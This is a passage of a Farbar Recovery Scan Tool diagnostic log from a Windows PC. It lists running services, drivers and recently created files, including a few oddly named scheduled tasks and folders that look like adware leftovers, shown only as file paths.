S3 Intel(R) Capability Licensing Service TCP IP Interface; C:\Program Files\Intel\iCLS Client\SocketHeciServer.exe [887256 2014-05-13] (Intel(R) Corporation)
R2 IntelUSBoverIP; C:\Program Files\Intel Corporation\USB over IP\bin\UoipService.exe [394184 2014-10-15] (Intel)
R2 ISCTAgent; c:\Program Files\Intel\Intel(R) Smart Connect Technology Agent\iSCTAgent.exe [209712 2014-08-14] ()
R2 jhi_service; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe [158496 2014-10-10] (Intel Corporation)
S3 MBAMService; C:\Program Files\Malwarebytes\Anti-Malware\mbamservice.exe [4355024 2017-01-20] (Malwarebytes)
S3 MyWiFiDHCPDNS; C:\Program Files\Intel\WiFi\bin\PanDhcpDns.exe [268192 2014-09-23] ()
S3 OpenVpnService; C:\Program Files\OpenVPN\bin\openvpnserv2.exe [15872 2016-11-25] ( ) [File not signed]
R2 OpenVPNServiceInteractive; C:\Program Files\OpenVPN\bin\openvpnserv.exe [70272 2016-12-27] (The OpenVPN Project)
S3 OpenVPNServiceLegacy; C:\Program Files\OpenVPN\bin\openvpnserv.exe [70272 2016-12-27] (The OpenVPN Project)
S3 ose; C:\Program Files (x86)\Common Files\Microsoft Shared\Source Engine\OSE.EXE [198192 2017-03-25] (Microsoft Corporation) [File not signed]
R2 RtkAudioService; C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe [292568 2014-09-04] (Realtek Semiconductor)
S3 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2013-12-04] (Microsoft Corporation)
R2 ZeroConfigService; C:\Program Files\Intel\WiFi\bin\ZeroConfigService.exe [3820960 2014-09-23] (Intel® Corporation)

===================== Drivers (Whitelisted) ======================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R3 btmaux; C:\Windows\System32\DRIVERS\btmaux.sys [141624 2014-05-13] (Motorola Solutions, Inc.)
R3 btmhsf; C:\Windows\System32\DRIVERS\btmhsf.sys [1424184 2014-06-17] (Motorola Solutions, Inc.)
S3 btmlehid; C:\Windows\system32\drivers\btmlehid.sys [83256 2014-02-04] (Motorola Solutions, Inc.)
R1 cmderd; C:\Windows\System32\DRIVERS\cmderd.sys [31664 2017-03-28] (COMODO)
R1 cmdGuard; C:\Windows\System32\DRIVERS\cmdguard.sys [848736 2017-03-28] (COMODO)
R2 DAMDrv; C:\Windows\System32\DRIVERS\DAMDrv64.sys [65752 2013-10-07] (Hewlett-Packard Company)
R3 dtlitescsibus; C:\Windows\System32\DRIVERS\dtlitescsibus.sys [30264 2017-04-08] (Disc Soft Ltd)
R3 dtliteusbbus; C:\Windows\System32\DRIVERS\dtliteusbbus.sys [47672 2017-04-08] (Disc Soft Ltd)
R0 iaStorF; C:\Windows\System32\drivers\iaStorF.sys [28008 2014-06-07] (Intel Corporation)
R3 ibtusb; C:\Windows\System32\DRIVERS\ibtusb.sys [222664 2014-09-16] (Intel Corporation)
R3 ikbevent; C:\Windows\System32\DRIVERS\ikbevent.sys [22216 2014-05-27] ()
R3 imsevent; C:\Windows\System32\DRIVERS\imsevent.sys [22728 2014-05-27] ()
R3 INETMON; C:\windows\System32\Drivers\INETMON.sys [25800 2014-05-27] ()
R3 ISCT; C:\Windows\system32\drivers\ISCTD.sys [44744 2014-05-27] ()
S3 MBAMSwissArmy; C:\Windows\system32\drivers\MBAMSwissArmy.sys [251832 2017-04-09] (Malwarebytes)
R3 MEIx64; C:\Windows\system32\drivers\TeeDriverx64.sys [129312 2014-10-10] (Intel Corporation)
R3 NETwNs64; C:\Windows\System32\DRIVERS\Netwsw02.sys [3429144 2014-10-17] (Intel Corporation)
R0 PinFile; C:\Windows\System32\DRIVERS\PinFile.sys [49856 2014-12-06] (WinMagic Inc.)
R3 RTSPER; C:\Windows\System32\DRIVERS\RtsPer.sys [476888 2014-03-22] (Realsil Semiconductor Corporation)
R0 SDDisk2K; C:\Windows\System32\DRIVERS\SDDisk2K.sys [228544 2014-12-06] (WinMagic Inc.)
R0 SDDToki; C:\Windows\System32\DRIVERS\SDDToki.sys [131264 2014-12-06] (WinMagic Inc.)
S3 SmbDrv; C:\Windows\system32\drivers\Smb_driver_AMDASF.sys [32496 2014-10-31] (Synaptics Incorporated)
S3 SmbDrvI; C:\Windows\system32\drivers\Smb_driver_Intel.sys [33008 2014-10-31] (Synaptics Incorporated)
R3 SPUVCbv; C:\Windows\System32\Drivers\SPUVCbv_x64.sys [674592 2014-10-07] (Sunplus)
S3 t_mouse.sys; C:\Windows\System32\DRIVERS\t_mouse.sys [6144 2012-12-19] ()
R3 usb3Hub; C:\Windows\System32\DRIVERS\usb3Hub.sys [213296 2014-10-15] (Windows (R) Win 7 DDK provider)
S3 dbx; system32\DRIVERS\dbx.sys [X]

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One Month Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2017-04-09 21:05 - 2017-04-09 21:05 - 00030376 _____ C:\Users\Tesla\Desktop\FRST.txt
2017-04-09 21:04 - 2017-04-09 21:05 - 00000000 ____D C:\FRST
2017-04-09 21:04 - 2017-04-09 21:04 - 02424832 _____ (Farbar) C:\Users\Tesla\Desktop\FRST64.exe
2017-04-09 21:01 - 2017-04-09 21:01 - 00001068 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk
2017-04-09 21:01 - 2017-04-09 21:01 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2017-04-09 20:59 - 2017-04-09 21:00 - 00001078 _____ C:\Windows\system32dbgraw.bmp
2017-04-09 20:53 - 2017-04-09 20:53 - 00000000 ____D C:\Users\Tesla\AppData\LocalLow\Google
2017-04-09 20:53 - 2017-04-09 20:53 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Earth
2017-04-09 20:51 - 2017-04-09 20:51 - 00002274 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2017-04-09 20:50 - 2017-04-09 20:50 - 00003384 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA
2017-04-09 20:50 - 2017-04-09 20:50 - 00003256 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore
2017-04-09 12:50 - 2017-04-09 12:50 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Heroes of the Storm
2017-04-09 12:16 - 2017-04-09 12:52 - 00000000 ____D C:\Users\Tesla\Documents\Heroes of the Storm
2017-04-09 11:42 - 2017-04-09 11:42 - 00003388 _____ C:\Windows\system32\Boot 01
2017-04-09 11:29 - 2017-04-09 11:37 - 00000000 ____D C:\Users\Tesla\AppData\Local\DigitalPersona,_Inc
2017-04-09 11:29 - 2017-04-09 11:29 - 00000000 ____D C:\Users\Tesla\AppData\Local\Disc_Soft_Ltd
2017-04-09 11:28 - 2017-04-09 11:28 - 00000000 ____D C:\Users\Public\Documents\Daemon Tools Images
2017-04-08 23:43 - 2017-04-08 23:43 - 00002648 _____ C:\Users\Tesla\AppData\Roaming\Microsoft\Windows\Start Menu\BitTorrent.lnk
2017-04-08 23:42 - 2017-04-08 23:43 - 00000000 ____D C:\Users\Tesla\AppData\Roaming\BitTorrent
2017-04-08 22:27 - 2017-04-08 22:27 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Dropbox
2017-04-08 22:26 - 2017-04-09 21:00 - 00000902 _____ C:\Windows\Tasks\DropboxUpdateTaskMachineCore.job
2017-04-08 22:26 - 2017-04-09 20:31 - 00000906 _____ C:\Windows\Tasks\DropboxUpdateTaskMachineUA.job
2017-04-08 22:26 - 2017-04-08 22:27 - 00000000 ____D C:\Users\Tesla\AppData\Local\Dropbox
2017-04-08 22:26 - 2017-04-08 22:27 - 00000000 ____D C:\Program Files (x86)\Dropbox
2017-04-08 22:26 - 2017-04-08 22:26 - 00003902 _____ C:\Windows\System32\Tasks\DropboxUpdateTaskMachineUA
2017-04-08 22:26 - 2017-04-08 22:26 - 00003650 _____ C:\Windows\System32\Tasks\DropboxUpdateTaskMachineCore
2017-04-08 22:26 - 2017-04-08 22:26 - 00000000 ____D C:\Users\Tesla\AppData\Roaming\Dropbox
2017-04-08 22:26 - 2017-04-08 22:26 - 00000000 ____D C:\ProgramData\Dropbox
2017-04-08 22:25 - 2017-04-08 22:25 - 00110144 _____ (Oracle Corporation) C:\Windows\system32\WindowsAccessBridge-64.dll
2017-04-08 22:25 - 2017-04-08 22:25 - 00000000 ____D C:\Users\Tesla\AppData\Roaming\Sun
2017-04-08 22:25 - 2017-04-08 22:25 - 00000000 ____D C:\Users\Tesla\AppData\LocalLow\Sun
2017-04-08 22:25 - 2017-04-08 22:25 - 00000000 ____D C:\ProgramData\Oracle
2017-04-08 22:25 - 2017-04-08 22:25 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java
2017-04-08 22:25 - 2017-04-08 22:25 - 00000000 ____D C:\Program Files\Java
2017-04-08 22:15 - 2017-04-08 22:15 - 00006046 _____ C:\Windows\System32\Tasks\Rqutyaninit Agent
2017-04-08 22:15 - 2017-04-08 22:15 - 00005076 _____ C:\Windows\System32\Tasks\Kooing
2017-04-08 22:15 - 2017-04-08 22:15 - 00000000 ____D C:\Users\Tesla\AppData\Roaming\Weqeriedecok
2017-04-08 22:15 - 2017-04-08 22:15 - 00000000 ____D C:\Users\Tesla\AppData\Local\Joruph
2017-04-08 22:15 - 2017-04-08 22:15 - 00000000 ____D C:\Program Files (x86)\Dermupy
2017-04-08 22:14 - 2017-04-09 11:28 - 00000000 ____D C:\Users\Tesla\AppData\Roaming\DAEMON Tools Lite
2017-04-08 22:14 - 2017-04-08 22:15 - 00000000 ____D C:\Program Files\DAEMON Tools Lite
2017-04-08 22:14 - 2017-04-08 22:14 - 00047672 _____ (Disc Soft Ltd) C:\Windows\system32\Drivers\dtliteusbbus.sys
2017-04-08 22:14 - 2017-04-08 22:14 - 00030264 _____ (Disc Soft Ltd) C:\Windows\system32\Drivers\dtlitescsibus.sys
2017-04-08 22:14 - 2017-04-08 22:14 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\DAEMON Tools Lite
2017-04-08 22:14 - 2017-04-08 22:14 - 00000000 ____D C:\ProgramData\DAEMON Tools Lite
2017-04-08 22:12 - 2017-04-08 22:12 - 00000901 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\GIMP 2.lnk
2017-04-08 22:12 - 2017-04-08 22:12 - 00000000 ____D C:\Program Files\GIMP 2
2017-04-08 22:11 - 2017-04-08 22:11 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\XnView
2017-04-08 22:11 - 2017-04-08 22:11 - 00000000 ____D C:\Program Files (x86)\XnView
2017-04-08 22:10 - 2017-04-08 22:10 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\RStudio
2017-04-08 22:10 - 2017-04-08 22:10 - 00000000 ____D C:\Program Files\RStudio
2017-04-08 18:52 - 2017-04-09 20:35 - 00251832 _____ (Malwarebytes) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2017-04-08 18:52 - 2017-04-08 18:52 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes
2017-04-08 18:52 - 2017-04-08 18:52 - 00000000 ____D C:\ProgramData\Malwarebytes
2017-04-08 18:52 - 2017-04-08 18:52 - 00000000 ____D C:\Program Files\Malwarebytes
2017-04-08 18:52 - 2017-03-24 04:10 - 00077440 _____ C:\Windows\system32\Drivers\mbae64.sys
2017-04-08 18:51 - 2017-04-08 18:51 - 00000000 ____D C:\Users\Tesla\AppData\Roaming\OpenOffice
2017-04-08 18:51 - 2017-04-08 18:51 - 00000000 ____D C:\Users\Tesla\AppData\Roaming\LibreOffice
2017-04-08 18:50 - 2017-04-08 18:51 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\LibreOffice 5.3
2017-04-08 18:50 - 2017-04-08 18:50 - 00000000 ____D C:\Program Files\LibreOffice 5
2017-04-08 18:46 - 2017-04-08 18:46 - 00000000 ___SD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\OpenOffice 4.1.3
2017-04-08 18:46 - 2017-04-08 18:46 - 00000000 ____D C:\Program Files (x86)\OpenOffice 4
2017-04-08 18:42 - 2017-04-08 22:08 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\R
2017-04-08 18:42 - 2017-04-08 18:42 - 00000000 ____D C:\Program Files\R
2017-04-08 17:04 - 2017-04-08 18:55 - 00000000 ____D C:\Users\Tesla\AppData\Roaming\MPC-HC
2017-04-08 17:04 - 2017-04-08 17:04 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\MPC-HC x64
2017-04-08 17:04 - 2017-04-08 17:04 - 00000000 ____D C:\Program Files\MPC-HC
2017-04-06 18:57 - 2017-04-06 18:57 - 00046408 _____ (Dropbox, Inc.) C:\Windows\system32\DbxSvc.exe
2017-04-06 11:25 - 2017-04-06 11:25 - 00000000 ____D C:\Users\Tesla\AppData\Roaming\.mono
2017-04-06 11:25 - 2017-04-06 11:25 - 00000000 ____D C:\Users\Tesla\AppData\LocalLow\Blizzard Entertainment
2017-04-06 11:25 - 2017-04-06 11:25 - 00000000 ____D C:\Users\Tesla\AppData\Local\Blizzard
2017-04-06 11:25 - 2017-04-06 11:25 - 00000000 ____D C:\ProgramData\.mono
2017-04-05 14:41 - 2017-04-05 14:41 - 00000000 ____D C:\Users\Tesla\AppData\Local\Last.fm
2017-04-05 14:41 - 2017-04-05 14:41 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Last.fm
2017-04-05 14:41 - 2017-04-05 14:41 - 00000000 ____D C:\ProgramData\Last.fm
2017-04-05 14:41 - 2017-04-05 14:41 - 00000000 ____D C:\Program Files (x86)\Winamp
2017-04-05 14:41 - 2017-04-05 14:41 - 00000000 ____D C:\Program Files (x86)\Last.fm
2017-04-05 08:31 - 2017-04-08 16:32 - 00000332 _____ C:\Windows\Tasks\HPCeeScheduleForTesla.job
2017-04-05 08:31 - 2017-04-07 14:55 - 00003186 _____ C:\Windows\System32\Tasks\HPCeeScheduleForTesla
2017-04-05 08:31 - 2017-04-05 08:31 - 00000000 ____D C:\Users\Tesla\AppData\Local\Hewlett-Packard
2017-04-04 16:33 - 2017-04-04 16:33 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Hearthstone
2017-04-04 16:30 - 2017-04-09 12:52 - 00000000 ____D C:\ProgramData\Blizzard Entertainment
2017-04-04 16:29 - 2017-04-09 16:46 - 00000000 ____D C:\Users\Tesla\AppData\Local\CrashDumps
2017-04-04 16:29 - 2017-04-09 14:04 - 00000000 ____D C:\Users\Tesla\AppData\Local\Battle.net
2017-04-04 16:29 - 2017-04-04 16:29 - 00000000 ____D C:\Users\Tesla\AppData\Local\Blizzard Entertainment
2017-04-04 16:29 - 2017-04-04 16:29 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Blizzard App
2017-04-04 16:28 - 2017-04-04 16:30 - 00000000 ____D C:\Users\Tesla\AppData\Roaming\Battle.net
2017-04-04 16:28 - 2017-04-04 16:28 - 00000000 ____D C:\ProgramData\Battle.net
2017-04-04 09:34 - 2017-04-07 16:04 - 00000000 ____D C:\Users\Tesla\AppData\Local\Spotify
2017-04-04 09:34 - 2017-04-07 13:04 - 00000000 ____D C:\Users\Tesla\AppData\Roaming\Spotify
2017-04-04 09:34 - 2017-04-04 09:34 - 00001760 _____ C:\Users\Tesla\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Spotify.lnk
2017-04-04 08:38 - 2017-04-04 08:38 - 00000568 _____ C:\Windows\system32\{F33C3B9B-72AF-418A-B3FD-560646F7CDA2}.bat
2017-04-04 08:38 - 2017-04-04 08:38 - 00000486 _____ C:\Windows\system32\{86F549EB-A66B-4D6C-958D-CDDD66410751}.bat
2017-04-04 08:38 - 2017-04-04 08:38 - 00000200 _____ C:\Windows\system32\{EC94D02F-D200-4428-9531-05AF7F9799CB}.bat
2017-04-04 08:25 - 2015-07-16 21:12 - 06131200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mstscax.dll
2017-04-04 08:25 - 2015-07-16 21:12 - 00856064 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rdvidcrl.dll
2017-04-04 08:25 - 2015-07-16 21:12 - 00053248 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tsgqec.dll
2017-04-04 08:25 - 2015-07-16 21:11 - 07077376 _____ (Microsoft Corporation) C:\Windows\system32\mstscax.dll
2017-04-04 08:25 - 2015-07-16 21:11 - 01057792 _____ (Microsoft Corporation) C:\Windows\system32\rdvidcrl.dll
2017-04-04 08:25 - 2015-07-16 21:11 - 00062976 _____ (Microsoft Corporation) C:\Windows\system32\tsgqec.dll
2017-04-04 08:25 - 2015-07-11 15:15 - 00429568 _____ (Microsoft Corporation) C:\Windows\system32\wksprt.exe
2017-04-03 16:12 - 2015-12-20 20:50 - 03180544 _____ (Microsoft Corporation) C:\Windows\system32\rdpcorets.dll
2017-04-03 16:12 - 2015-12-20 20:50 - 00016384 _____ (Microsoft Corporation) C:\Windows\system32\RdpGroupPolicyExtension.dll
2017-04-03 16:12 - 2015-12-20 16:08 - 00243200 _____ (Microsoft Corporation) C:\Windows\system32\rdpudd.dll
2017-04-03 16:12 - 2014-12-11 19:47 - 00087040 _____ (Microsoft Corporation) C:\Windows\system32\TSWbPrxy.exe
2017-04-03 16:09 - 2017-04-03 16:09 - 00000223 _____ C:\Windows\system32\{8A694AF2-286D-429D-867A-3F95898EE308}.bat
2017-04-03 16:05 - 2017-04-03 16:05 - 00000000 _____ C:\Windows\SysWOW64\SET3D26.tmp
2017-04-03 16:05 - 2017-04-03 16:05 - 00000000 _____ C:\Windows\system32\SET4F33.tmp
2017-04-03 16:05 - 2017-04-03 16:05 - 00000000 _____ C:\Windows\system32\SET4DD6.tmp
2017-04-03 16:05 - 2017-04-03 16:05 - 00000000 _____ C:\Windows\system32\SET4968.tmp
2017-04-03 16:03 - 2017-04-03 16:03 - 00000000 ___RD C:\Program Files (x86)\Skype
2017-04-03 16:03 - 2017-04-03 16:03 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Skype
2017-04-03 15:56 - 2013-10-02 04:22 - 00056832 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\TsUsbFlt.sys
2017-04-03 15:56 - 2013-10-02 04:11 - 00013824 _____ (Microsoft Corporation) C:\Windows\system32\TsUsbRedirectionGroupPolicyControl.exe
2017-04-03 15:56 - 2013-10-02 04:08 - 00012800 _____ (Microsoft Corporation) C:\Windows\system32\TsUsbRedirectionGroupPolicyExtension.dll
2017-04-03 15:56 - 2013-10-02 03:48 - 00056832 _____ (Microsoft Corporation) C:\Windows\system32\MsRdpWebAccess.dll
2017-04-03 15:56 - 2013-10-02 03:48 - 00018944 _____ (Microsoft Corporation) C:\Windows\system32\wksprtPS.dll
2017-04-03 15:56 - 2013-10-02 03:10 - 00044544 _____ (Microsoft Corporation) C:\Windows\system32\TsUsbGDCoInstaller.dll
2017-04-03 15:56 - 2013-10-02 02:14 - 00050176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MsRdpWebAccess.dll
2017-04-03 15:56 - 2013-10-02 02:14 - 00017920 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wksprtPS.dll
2017-04-03 15:56 - 2013-10-02 01:31 - 01147392 _____ (Microsoft Corporation) C:\Windows\system32\mstsc.exe
2017-04-03 15:56 - 2013-10-02 00:34 - 01068544 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mstsc.exe
2017-04-03 15:55 - 2012-08-23 16:10 - 00019456 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\rdpvideominiport.sys
2017-04-03 15:55 - 2012-08-23 16:08 - 00030208 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\TsUsbGD.sys
2017-04-03 15:55 - 2012-08-23 13:12 - 00192000 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rdpendp_winip.dll
2017-04-03 15:55 - 2012-08-23 12:51 - 00228864 _____ (Microsoft Corporation) C:\Windows\system32\rdpendp_winip.dll
2017-04-03 15:54 - 2015-08-05 19:56 - 00022528 _____ (Microsoft Corporation) C:\Windows\system32\icaapi.dll
2017-04-03 15:54 - 2015-08-05 19:06 - 00039936 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\tssecsrv.sys
2017-04-03 15:53 - 2017-03-08 06:33 - 03165184 _____ (Microsoft Corporation) C:\Windows\system32\wucltux.dll
2017-04-03 15:53 - 2017-03-08 06:33 - 00192512 _____ (Microsoft Corporation) C:\Windows\system32\wuwebv.dll
2017-04-03 15:53 - 2017-03-08 06:33 - 00098816 _____ (Microsoft Corporation) C:\Windows\system32\wudriver.dll
2017-04-03 15:53 - 2017-03-08 06:31 - 00091136 _____ (Microsoft Corporation) C:\Windows\system32\WinSetupUI.dll
2017-04-03 15:53 - 2017-03-08 06:22 - 00174080 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wuwebv.dll
2017-04-03 15:53 - 2017-03-08 06:18 - 02651136 _____ (Microsoft Corporation) C:\Windows\system32\wuaueng.dll
2017-04-03 15:53 - 2017-03-08 06:16 - 00709120 _____ (Microsoft Corporation) C:\Windows\system32\wuapi.dll
2017-04-03 15:53 - 2017-03-08 06:16 - 00140288 _____ (Microsoft Corporation) C:\Windows\system32\wuauclt.exe
2017-04-03 15:53 - 2017-03-08 06:16 - 00037888 _____ (Microsoft Corporation) C:\Windows\system32\wups2.dll
2017-04-03 15:53 - 2017-03-08 06:16 - 00037888 _____ (Microsoft Corporation) C:\Windows\system32\wuapp.exe
2017-04-03 15:53 - 2017-03-08 06:16 - 00036864 _____ (Microsoft Corporation) C:\Windows\system32\wups.dll
2017-04-03 15:53 - 2017-03-08 06:16 - 00012288 _____ (Microsoft Corporation) C:\Windows\system32\wu.upgrade.ps.dll
2017-04-03 15:53 - 2017-03-08 06:07 - 00573440 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wuapi.dll
2017-04-03 15:53 - 2017-03-08 06:06 - 00093696 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wudriver.dll
2017-04-03 15:53 - 2017-03-08 06:06 - 00035328 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wuapp.exe
2017-04-03 15:53 - 2017-03-08 06:06 - 00030208 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wups.dll
2017-04-03 15:53 - 2017-02-14 18:33 - 00757248 _____ (Microsoft Corporation) C:\Windows\system32\win32spl.dll
2017-04-03 15:53 - 2017-02-14 18:19 - 00497664 _____ (Microsoft Corporation) C:\Windows\SysWOW64\win32spl.dll
2017-04-03 15:53 - 2017-02-11 18:33 - 00002048 _____ (Microsoft Corporation) C:\Windows\system32\tzres.dll
2017-04-03 15:53 - 2017-02-11 18:16 - 00002048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tzres.dll
2017-04-03 15:53 - 2017-02-09 18:32 - 00769536 _____ (Microsoft Corporation) C:\Windows\system32\samsrv.dll
2017-04-03 15:53 - 2017-02-09 18:32 - 00106496 _____ (Microsoft Corporation) C:\Windows\system32\samlib.dll
2017-04-03 15:53 - 2017-02-09 18:14 - 00060416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\samlib.dll
2017-04-03 15:53 - 2017-01-18 17:36 - 00994760 _____ (Microsoft Corporation) C:\Windows\system32\ucrtbase.dll
2017-04-03 15:53 - 2017-01-18 17:36 - 00063840 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-private-l1-1-0.dll
2017-04-03 15:53 - 2017-01-18 17:36 - 00020832 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-math-l1-1-0.dll
2017-04-03 15:53 - 2017-01-18 17:36 - 00019808 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-multibyte-l1-1-0.dll
2017-04-03 15:53 - 2017-01-18 17:36 - 00017760 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-string-l1-1-0.dll
2017-04-03 15:53 - 2017-01-18 17:36 - 00017760 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-stdio-l1-1-0.dll
2017-04-03 15:53 - 2017-01-18 17:36 - 00016224 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-runtime-l1-1-0.dll
2017-04-03 15:53 - 2017-01-18 17:36 - 00015712 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-convert-l1-1-0.dll
2017-04-03 15:53 - 2017-01-18 17:36 - 00014176 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-time-l1-1-0.dll
2017-04-03 15:53 - 2017-01-18 17:36 - 00014176 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-localization-l1-2-0.dll
2017-04-03 15:53 - 2017-01-18 17:36 - 00013664 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-filesystem-l1-1-0.dll
2017-04-03 15:53 - 2017-01-18 17:36 - 00012640 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-process-l1-1-0.dll
2017-04-03 15:53 - 2017-01-18 17:36 - 00012640 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-heap-l1-1-0.dll
2017-04-03 15:53 - 2017-01-18 17:36 - 00012640 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-conio-l1-1-0.dll
2017-04-03 15:53 - 2017-01-18 17:36 - 00012128 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-utility-l1-1-0.dll
2017-04-03 15:53 - 2017-01-18 17:36 - 00012128 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-locale-l1-1-0.dll
2017-04-03 15:53 - 2017-01-18 17:36 - 00012128 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-environment-l1-1-0.dll
2017-04-03 15:53 - 2017-01-18 17:36 - 00012128 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-synch-l1-2-0.dll
2017-04-03 15:53 - 2017-01-18 17:36 - 00012128 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-processthreads-l1-1-1.dll
2017-04-03 15:53 - 2017-01-18 17:36 - 00011616 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-xstate-l2-1-0.dll
2017-04-03 15:53 - 2017-01-18 17:36 - 00011616 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-timezone-l1-1-0.dll
2017-04-03 15:53 - 2017-01-18 17:36 - 00011616 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-file-l2-1-0.dll
2017-04-03 15:53 - 2017-01-18 17:36 - 00011608 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-file-l1-2-0.dll
2017-04-03 15:53 - 2017-01-18 17:35 - 00922432 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ucrtbase.dll
2017-04-03 15:53 - 2017-01-18 17:35 - 00066400 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-private-l1-1-0.dll
2017-04-03 15:53 - 2017-01-18 17:35 - 00022368 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-math-l1-1-0.dll
2017-04-03 15:53 - 2017-01-18 17:35 - 00019808 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-multibyte-l1-1-0.dll
2017-04-03 15:53 - 2017-01-18 17:35 - 00017760 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-string-l1-1-0.dll
2017-04-03 15:53 - 2017-01-18 17:35 - 00017760 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-stdio-l1-1-0.dll
2017-04-03 15:53 - 2017-01-18 17:35 - 00016224 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-runtime-l1-1-0.dll
2017-04-03 15:53 - 2017-01-18 17:35 - 00015712 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-convert-l1-1-0.dll
2017-04-03 15:53 - 2017-01-18 17:35 - 00014176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-time-l1-1-0.dll
2017-04-03 15:53 - 2017-01-18 17:35 - 00014176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-localization-l1-2-0.dll
2017-04-03 15:53 - 2017-01-18 17:35 - 00013664 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-filesystem-l1-1-0.dll
2017-04-03 15:53 - 2017-01-18 17:35 - 00012640 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-process-l1-1-0.dll
2017-04-03 15:53 - 2017-01-18 17:35 - 00012640 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-heap-l1-1-0.dll
2017-04-03 15:53 - 2017-01-18 17:35 - 00012640 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-conio-l1-1-0.dll
2017-04-03 15:53 - 2017-01-18 17:35 - 00012128 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-utility-l1-1-0.dll
2017-04-03 15:53 - 2017-01-18 17:35 - 00012128 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-locale-l1-1-0.dll
